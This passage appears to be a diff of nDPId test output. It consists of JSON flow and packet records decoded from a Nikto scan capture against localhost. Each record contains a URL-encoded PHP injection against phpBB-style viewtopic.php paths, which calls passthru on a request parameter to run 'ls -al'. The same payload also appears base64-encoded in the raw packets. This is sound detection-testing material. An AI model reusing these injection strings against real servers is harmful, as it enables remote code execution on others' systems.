00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_packet_id":1,"flow_last_seen":1576420277836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277836,"pkt":"AAAAAAAAAAAAAAAACABFAAFPP1dAAEAG\/E9\/AAABfwAAAcciH5AaoQZne4dTBYAYAED\/QwAAAQEICp1m\/3OdZv9zR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01192{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +01192{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_packet_id":1,"flow_last_seen":1576420277838,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":358,"pkt_l4_len":324,"thread_ts_msec":1576420277838,"pkt":"AAAAAAAAAAAAAAAACABFAAFY3j1AAEAGXWB\/AAABfwAAAcckH5DNwecJcN6f0YAYAED\/TAAAAQEICp1m\/3adZv92R0VUIC9wb3N0bnVrZS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01202{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +01202{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_packet_id":1,"flow_last_seen":1576420277840,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277840,"pkt":"AAAAAAAAAAAAAAAACABFAAFdmNpAAEAGor5\/AAABfwAAAccmH5CDpKHt6Uk16IAYAED\/UQAAAQEICp1m\/3idZv93R0VUIC9wb3N0bnVrZS9odG1sL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01208{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +01208{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7580000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00868{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_packet_id":1,"flow_last_seen":1576420277841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"thread_ts_msec":1576420277841,"pkt":"AAAAAAAAAAAAAAAACABFAAFXf1lAAEAGvEV\/AAABfwAAAccoH5A3NUZkeJaOS4AYAED\/SwAAAQEICp1m\/3mdZv95R0VUIC9tb2R1bGVzL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01201{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7580000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +01201{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7580000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00867{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_packet_id":1,"flow_last_seen":1576420277843,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":355,"pkt_l4_len":321,"thread_ts_msec":1576420277843,"pkt":"AAAAAAAAAAAAAAAACABFAAFV4EBAAEAGW2B\/AAABfwAAAccqH5AAS9kLhsuzOIAYAED\/SQAAAQEICp1m\/3udZv96R0VUIC9waHBCQi92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQoNCg=="} -01199{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +01199{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00868{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_packet_id":1,"flow_last_seen":1576420277844,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":355,"pkt_l4_len":321,"thread_ts_msec":1576420277844,"pkt":"AAAAAAAAAAAAAAAACABFAAFVVuFAAEAG5L9\/AAABfwAAAccsH5DRJG\/rOSfatoAYAED\/SQAAAQEICp1m\/3ydZv98R0VUIC9mb3J1bS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01199{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +01199{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7580000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_packet_id":1,"flow_last_seen":1576420277845,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"thread_ts_msec":1576420277845,"pkt":"AAAAAAAAAAAAAAAACABFAAFouhJAAEAGgXt\/AAABfwAAAccuH5A6xYMmaghNdoAYAED\/XAAAAQEICp1m\/32dZv99R0VUIC9pbmRleC5waHA\/bmFtZT1QTnBocEJCMiZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxNDAwKQ0KDQo="} -01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7580000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 